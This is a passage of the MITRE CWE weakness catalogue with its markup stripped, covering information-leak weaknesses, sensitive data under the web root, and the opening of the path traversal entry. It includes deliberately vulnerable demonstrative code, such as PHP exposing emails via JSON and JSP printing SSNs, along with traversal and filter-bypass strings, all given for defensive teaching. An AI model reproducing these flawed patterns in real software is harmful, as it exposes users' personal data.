Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Product-External Error Message Information Leak + Information Exposure Through External Error Message + Information Exposure Through Externally-Generated Error Message + + + + The product stores, transfers, or shares a resource that contains sensitive information, but it does not properly remove that information before the product makes the resource available to unauthorized actors. + + Resources that may contain sensitive data include documents, packets, messages, databases, etc. While this data may be useful to an individual user or small set of users who share the resource, it may need to be removed before the resource can be shared outside of the trusted group. The process of removal is sometimes called cleansing or scrubbing. + For example, a product for editing documents might not remove sensitive data such as reviewer comments or the local pathname where the document is stored. Or, a proxy might not remove an internal IP address from headers before making an outgoing request to an Internet site. + + + + + + + + + Primary + + + Resultant + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Confidentiality + Read Files or Directories + Read Application Data + Sensitive data may be exposed to an unauthorized actor in another control sphere. This may have a wide range of secondary consequences which will depend on what data is exposed. One possibility is the exposure of system data allowing an attacker to craft a specific, more effective attack. + + + + + Requirements + Clearly specify which information should be regarded as private or sensitive, and require that the product offers functionality that allows the user to cleanse the sensitive information from the resource before it is published or exported to other parties. + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + Implementation + Attack Surface Reduction + Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible. + Defense in Depth + This makes it easier to spot places in the code where data is being used that is unencrypted. + + + Implementation + Avoid errors related to improper resource shutdown or release (CWE-404), which may leave the sensitive data within the resource if it is in an incomplete state. + + + + + This code either generates a public HTML user information page or a JSON response containing the same user information. + + + + // API flag, output JSON if set + $json = $_GET['json']$username = $_GET['user']if(!$json){ + $record = getUserRecord($username);foreach($record as $fieldName => $fieldValue){ + if($fieldName == "email_address") { + + + // skip displaying user emails + continue; + }else{writeToHtmlPage($fieldName,$fieldValue);} + } + }else{$record = getUserRecord($username);echo json_encode($record);} + + The programmer is careful to not display the user's e-mail address when displaying the public HTML page. However, the e-mail address is not removed from the JSON response, exposing the user's e-mail address. + + + + + CVE-2005-0406 + Some image editors modify a JPEG image, but the original EXIF thumbnail image is left intact within the JPEG. (Also an interaction error). + https://www.cve.org/CVERecord?id=CVE-2005-0406 + + + CVE-2002-0704 + NAT feature in firewall leaks internal IP addresses in ICMP error messages. + https://www.cve.org/CVERecord?id=CVE-2002-0704 + + + + + Cross-Boundary Cleansing Infoleak + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is intended to be different from resultant information leaks, including those that occur from improper buffer initialization and reuse, improper encryption, interaction errors, and multiple interpretation errors. This entry could be regarded as a privacy leak, depending on the type of information that is leaked. + There is a close association between CWE-226 and CWE-212. The difference is partially that of perspective. CWE-226 is geared towards the final stage of the resource lifecycle, in which the resource is deleted, eliminated, expired, or otherwise released for reuse. Technically, this involves a transfer to a different control sphere, in which the original contents of the resource are no longer relevant. CWE-212, however, is intended for sensitive data in resources that are intentionally shared with others, so they are still active. This distinction is useful from the perspective of the CWE research view (CWE-1000). + The terms "cleansing" and "scrubbing" have multiple uses within computing. In information security, these are used for the removal of sensitive data, but they are also used for the modification of incoming/outgoing data so that it conforms to specifications. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2009-12-28 + updated Name + + + CWE Content Team + MITRE + 2010-02-16 + updated Applicable_Platforms, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, Relationship_Notes, Relationships, Terminology_Notes + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Cross-boundary Cleansing Information Leak + Improper Cross-boundary Cleansing + Improper Cross-boundary Removal of Sensitive Data + + + + The product's intended functionality exposes information to certain actors in accordance with the developer's security policy, but this information is regarded as sensitive according to the intended security policies of other stakeholders such as the product's administrator, users, or others whose information is being processed. + + When handling information, the developer must consider whether the information is regarded as sensitive by different stakeholders, such as users or administrators. Each stakeholder effectively has its own intended security policy that the product is expected to uphold. When a developer does not treat that information as sensitive, this can introduce a vulnerability that violates the expectations of the product's users. + + + + + + + + + + Policy + This can occur when the product's policy does not account for all relevant stakeholders, or when the policies of other stakeholders are not interpreted properly. + + + Requirements + This can occur when requirements do not explicitly account for all relevant stakeholders. + + + Architecture and Design + Communications or data exchange frameworks may be chosen that exchange or provide access to more information than strictly needed. + + + Implementation + This can occur when the developer does not properly track the flow of sensitive information and how it is exposed, e.g., via an API. + + + + + Confidentiality + Read Application Data + + + + + This code displays some information on a web page. + + Social Security Number: <%= ssn %></br>Credit Card Number: <%= ccn %> + + The code displays a user's credit card and social security numbers, even though they aren't absolutely necessary. + + + + + CVE-2002-1725 + Script calls phpinfo() + https://www.cve.org/CVERecord?id=CVE-2002-1725 + + + CVE-2004-0033 + Script calls phpinfo() + https://www.cve.org/CVERecord?id=CVE-2004-0033 + + + CVE-2003-1181 + Script calls phpinfo() + https://www.cve.org/CVERecord?id=CVE-2003-1181 + + + CVE-2004-1422 + Script calls phpinfo() + https://www.cve.org/CVERecord?id=CVE-2004-1422 + + + CVE-2004-1590 + Script calls phpinfo() + https://www.cve.org/CVERecord?id=CVE-2004-1590 + + + CVE-2003-1038 + Product lists DLLs and full pathnames. + https://www.cve.org/CVERecord?id=CVE-2003-1038 + + + CVE-2005-1205 + Telnet protocol allows servers to obtain sensitive environment information from clients. + https://www.cve.org/CVERecord?id=CVE-2005-1205 + + + CVE-2005-0488 + Telnet protocol allows servers to obtain sensitive environment information from clients. + https://www.cve.org/CVERecord?id=CVE-2005-0488 + + + + + Intended information leak + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is being considered for deprecation. It overlaps many other entries related to information exposures. It might not be essential to preserve this entry, since other key stakeholder policies are covered elsewhere, e.g. personal privacy leaks (CWE-359) and system-level exposures that are important to system administrators (CWE-497). + In vulnerability theory terms, this covers cases in which the developer's Intended Policy allows the information to be made available, but the information might be in violation of a Universal Policy in which the product's administrator should have control over which information is considered sensitive and therefore should not be exposed. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes, Relationship_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Name, Other_Notes, Relationship_Notes, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Intended Information Leak + Intentional Information Exposure + + + + A process is invoked with sensitive command-line arguments, environment variables, or other elements that can be seen by other processes on the operating system. + Many operating systems allow a user to list information about processes that are owned by other users. Other users could see information such as command line arguments or environment variable settings. When this data contains sensitive information such as credentials, it might allow other users to launch an attack against the product or related resources. + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Confidentiality + Read Application Data + + + + + In the example below, the password for a keystore file is read from a system property. + + String keystorePass = System.getProperty("javax.net.ssl.keyStorePassword");if (keystorePass == null) {System.err.println("ERROR: Keystore password not specified.");System.exit(-1);} + ... + + If the property is defined on the command line when the program is invoked (using the -D... syntax), the password may be displayed in the OS process list. + + + + + CVE-2005-1387 + password passed on command line + https://www.cve.org/CVERecord?id=CVE-2005-1387 + + + CVE-2005-2291 + password passed on command line + https://www.cve.org/CVERecord?id=CVE-2005-2291 + + + CVE-2001-1565 + username/password on command line allows local users to view via "ps" or other process listing programs + https://www.cve.org/CVERecord?id=CVE-2001-1565 + + + CVE-2004-1948 + Username/password on command line allows local users to view via "ps" or other process listing programs. + https://www.cve.org/CVERecord?id=CVE-2004-1948 + + + CVE-1999-1270 + PGP passphrase provided as command line argument. + https://www.cve.org/CVERecord?id=CVE-1999-1270 + + + CVE-2004-1058 + Kernel race condition allows reading of environment variables of a process that is still spawning. + https://www.cve.org/CVERecord?id=CVE-2004-1058 + + + CVE-2021-32638 + Code analysis product passes access tokens as a command-line parameter or through an environment variable, making them visible to other processes via the ps command. + https://www.cve.org/CVERecord?id=CVE-2021-32638 + + + + System Process + + + + Process information infoleak to other processes + + + SFP23 + Exposed Data + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Under-studied, especially environment variables. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Process Information Leak to Other Processes + Process Environment Information Leak + Information Exposure Through Process Environment + + + + The product inserts sensitive information into debugging code, which could expose this information if the debugging code is not disabled in production. + When debugging, it may be necessary to report detailed information to the programmer. However, if the debugging code is not disabled when the product is operating in a production environment, then this sensitive information may be exposed to attackers. + + + + + + + + + + Implementation + + + + + Confidentiality + Read Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Do not leave debug statements that could be executed in the source code. Ensure that all debug information is eradicated before releasing the software. + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + + + The following program changes its behavior based on a debug flag. + + <% if (Boolean.getBoolean("debugEnabled")) { + %>User account number: <%= acctNo %><%} %> + + + + + The code writes sensitive debug information to the client browser if the "debugEnabled" flag is set to true . + + + + + CVE-2004-2268 + Password exposed in debug information. + https://www.cve.org/CVERecord?id=CVE-2004-2268 + + + CVE-2002-0918 + CGI script includes sensitive information in debug messages when an error is triggered. + https://www.cve.org/CVERecord?id=CVE-2002-0918 + + + CVE-2003-1078 + FTP client with debug option enabled shows password to the screen. + https://www.cve.org/CVERecord?id=CVE-2003-1078 + + + + + Infoleak Using Debug Information + + + A6 + Information Leakage and Improper Error Handling + CWE More Specific + + + A10 + Insecure Configuration Management + CWE More Specific + + + SFP23 + Exposed Data + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This overlaps other categories. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-09-27 + updated Description, Name, Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Debug Information + Information Exposure Through Debug Information + + + + This entry has been deprecated, as it was not effective as a weakness and was structured more like a category. In addition, the name is inappropriate, since the "container" term is widely understood by developers in different ways than originally intended by PLOVER, the original source for this entry. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Containment Errors (Container Errors) + + + + This entry has been deprecated because it incorporated and confused multiple weaknesses. The issues formerly covered in this entry can be found at CWE-766 and CWE-767. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-20 + deprecated this entry in favor of new entries which focus on the multiple weaknesses formerly described here, CWE-766 and CWE-767 + + + CWE Content Team + MITRE + 2009-05-27 + updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Description + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Failure to Protect Stored Data from Modification + + + + This weakness has been deprecated because it was a duplicate of CWE-493. All content has been transferred to CWE-493. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Description, Likelihood_of_Exploit, Name, Relationships, Type + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Name + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Failure to Provide Confidentiality for Stored Data + DEPRECATED (Duplicate): Failure to provide confidentiality for stored data + + + + The product stores sensitive data under the web document root with insufficient access control, which might make it accessible to untrusted parties. + + Besides public-facing web pages and code, products may store sensitive data, code that is not directly invoked, or other files under the web document root of the web server. If the server is not configured or otherwise used to prevent direct access to those files, then attackers may obtain this sensitive data. + + + + + + + + + + Operation + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Implementation + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + + + Confidentiality + Read Application Data + + + + + Implementation + System Configuration + Avoid storing information under the web root directory. + + + System Configuration + Access control permissions should be set to prevent reading/writing of sensitive files inside/outside of the web directory. + + + + + CVE-2005-1835 + Data file under web root. + https://www.cve.org/CVERecord?id=CVE-2005-1835 + + + CVE-2005-2217 + Data file under web root. + https://www.cve.org/CVERecord?id=CVE-2005-2217 + + + CVE-2002-1449 + Username/password in data file under web root. + https://www.cve.org/CVERecord?id=CVE-2002-1449 + + + CVE-2002-0943 + Database file under web root. + https://www.cve.org/CVERecord?id=CVE-2002-0943 + + + CVE-2005-1645 + database file under web root. + https://www.cve.org/CVERecord?id=CVE-2005-1645 + + + + + Sensitive Data Under Web Root + + + A10 + Insecure Configuration Management + CWE More Specific + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-12-28 + updated Relationships + + + CWE Content Team + MITRE + 2010-06-21 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Sensitive Data Under Web Root + + + + The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. + + Many file operations are intended to take place within a restricted directory. By using special elements such as ".." and "/" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system. One of the most common special elements is the "../" sequence, which in most modern operating systems is interpreted as the parent directory of the current location. This is referred to as relative path traversal. Path traversal also covers the use of absolute pathnames such as "/usr/local/bin", which may also be useful in accessing unexpected files. This is referred to as absolute path traversal. + In many programming languages, the injection of a null byte (the 0 or NUL) may allow an attacker to truncate a generated filename to widen the scope of attack. For example, the product may add ".txt" to any pathname, thus limiting the attacker to text files, but a null injection may effectively remove this restriction. + + + + + + + + + Primary + + + Resultant + + + + + + + + Directory traversal + + + Path traversal + "Path traversal" is preferred over "directory traversal," but both terms are attack-focused. + + + + + Implementation + + + High + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries. + + + Integrity + Modify Files or Directories + The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication. + + + Confidentiality + Read Files or Directories + The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system. + + + Availability + DoS: Crash, Exit, or Restart + The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the product from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the product. + + + + + Automated Static Analysis + Automated techniques can find areas where path traversal weaknesses exist. However, tuning or customization may be required to remove or de-prioritize path-traversal problems that are only exploitable by the product's administrator - or other privileged users - and thus potentially valid behavior or, at worst, a bug instead of a vulnerability. + High + + + Manual Static Analysis + Manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all file access operations can be assessed within limited time constraints. + High + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + + Cost effective for partial coverage: + + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + High + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + High + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Fuzz Tester + Framework-based Fuzzer + + + + High + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Implementation + Input Validation + + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes: + + realpath() in C + getCanonicalPath() in Java + GetFullPath() in ASP.NET + realpath() or abs_path() in Perl + realpath() in PHP + + + + + Architecture and Design + Libraries or Frameworks + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + + + Operation + Firewall + Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth. + Moderate + An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization. + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + Architecture and Design + Enforcement by Conversion + + When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. + For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability. + + + + Architecture and Design + Operation + Sandbox or Jail + + Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. + OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. + This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. + Be careful to avoid CWE-243 and other weaknesses related to jails. + + Limited + The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox 